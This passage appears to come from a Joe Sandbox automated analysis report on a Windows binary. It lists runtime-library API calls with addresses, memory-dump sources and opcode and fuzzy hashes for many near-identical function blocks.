                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                            • String ID: kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                            • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                            • Instruction ID: 5f1891afa62f468227035c915ee513812fc5e4264239869d0fd027f1f7355b9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0F9759003103FF7117B757D6981B3FACDD5AA23320023BF802E2291EBB5C5019658
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throw
                                                                                                                                                                                                                                            • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                            • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                            • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• _memcmp.LIBVCRUNTIME ref: 0043116C
• _free.LIBCMT ref: 004311DD
• _free.LIBCMT ref: 004311F6
• _free.LIBCMT ref: 00431228
• _free.LIBCMT ref: 00431231
• _free.LIBCMT ref: 0043123D
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: _free$ErrorLast$_memcmp
• String ID:
• API String ID: 4275183328-0
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024C25EC,00000001,00000001,?), ref: 024C23F5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024C25EC,00000001,00000001,?,?,?,?), ref: 024C247B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024C2575
• __freea.LIBCMT ref: 024C2582
  • Part of subcall function 024C390E: RtlAllocateHeap.NTDLL(00000000,0249DAD7,00000000), ref: 024C3940
• __freea.LIBCMT ref: 024C258B
• __freea.LIBCMT ref: 024C25B0
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
APIs
• Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024B3051
  • Part of subcall function 024A8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024A8ABD
• SafeSQueue.LIBCONCRT ref: 024B306A
• Concurrency::location::_Assign.LIBCMT ref: 024B312A
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024B314B
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B3159
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
• String ID:
• API String ID: 3496964030-0
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 024B8F77
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 024B8F90
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 024B8F97
• PMDtoOffset.LIBCMT ref: 024B8FB6
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID:
• API String ID: 1467055271-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
APIs
• GetLastError.KERNEL32(?,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B904F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024B905D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024B9076
• SetLastError.KERNEL32(00000000,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B90C8
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction ID: 52334fe92522e38c59e5aa06fb3791982173b72628c52414da0830fe3f1b5e94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B601F7326097216EA72B27B5AC88AE72755EF05775B30033FFA20453E1EF1288554DB9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,B4B77C26), ref: 00428DE8
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,B4B77C26), ref: 00428E61
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 02494FCA
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 02494FE1
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 02494FEA
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0249501B
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 02495031
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0249504F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction ID: fa33ef56bb0c95eeb39764d851304065e66f7ef03ad4c32615aad209ff46229a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D211AC319002289BCF26EBA5D800BAE7FB6BF04314F64011FE416AB290DB749A068FD0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0249C401
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0249C418
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0249C421
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0249C452
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0249C468
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C486
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction ID: 768ddee3b84e9ddeaa3bf83ec9fb509deffc589887249256fa741be070419ae9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5311E1719002289BCF15FBA5D884AEE7F76AF49714F10011FE411BB290DF748A05CFA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 02494E8C
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 02494EA3
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 02494EAC
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 02494EDD
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 02494EF3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 02494F11
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction ID: d47f19abc1e49232ed04b5a5dcb823522a3c093a12b881c46147ccb0ac8bd282
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2411CE32D002299BCF15EBA5E800BEE7F76AF44314F24011FE411A7290DB749E06CF90
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                            • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                            • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                              • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID: fJ@
                                                                                                                                                                                                                                            • API String ID: 1836011271-3478227103
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
• FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
